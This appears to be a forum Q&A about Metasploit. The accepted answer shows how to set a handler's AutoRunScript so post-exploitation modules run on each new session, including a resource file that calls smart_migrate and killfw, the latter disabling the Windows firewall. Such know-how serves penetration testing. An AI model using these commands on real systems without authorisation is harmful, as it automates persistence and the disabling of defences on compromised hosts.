# Metasploit automatic module execution on receival of shell?

Tags: metasploit

After reading through a couple of webpages referring to metasploit I stumbled upon a post referring to the auto execution of metasploit modules upon the receiving of a shell. Namely the post exploitation module, smart-migrate.

Is there anyway that I could change any config files so that this happens?

Thanks for all your help!!!

Comment: You want to automate this process? Doing this manually is very easy. http://www.rapid7.com/db/modules/post/windows/manage/smart_migrate

Answer (score 2, accepted):

The handler has an AutoRunScript option which specifies what happens when a session is received. You can give it the multi_console_command script which will be able to execute multiple post modules and meterpreter scripts upon receiving session.

For example, in order to run the smart_migrate and killfw post modules:

```
msf > use exploit/multi/handler
msf (handler) > set AutoRunScript multi_console_command -rc /root/mycommands.rb
```

The contents of /root/mycommands.rb include:

```
root@kali# cat /root/mycommands.rb
run post/windows/manage/smart_migrate
run post/windows/manage/killfw
```